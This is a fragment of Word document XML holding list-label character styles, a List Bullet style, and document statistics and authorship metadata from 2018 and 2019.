  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel77">
    <w:name w:val="ListLabel 77"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel78">
    <w:name w:val="ListLabel 78"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel79">
    <w:name w:val="ListLabel 79"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel80">
    <w:name w:val="ListLabel 80"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel81">
    <w:name w:val="ListLabel 81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Bullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E47EDB"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr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</Pages>
  <Words>391</Words>
  <Characters>2232</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>18</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Yarlagadda, Hemanth (yarlaghh)</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-22T23:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-11T11:28:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>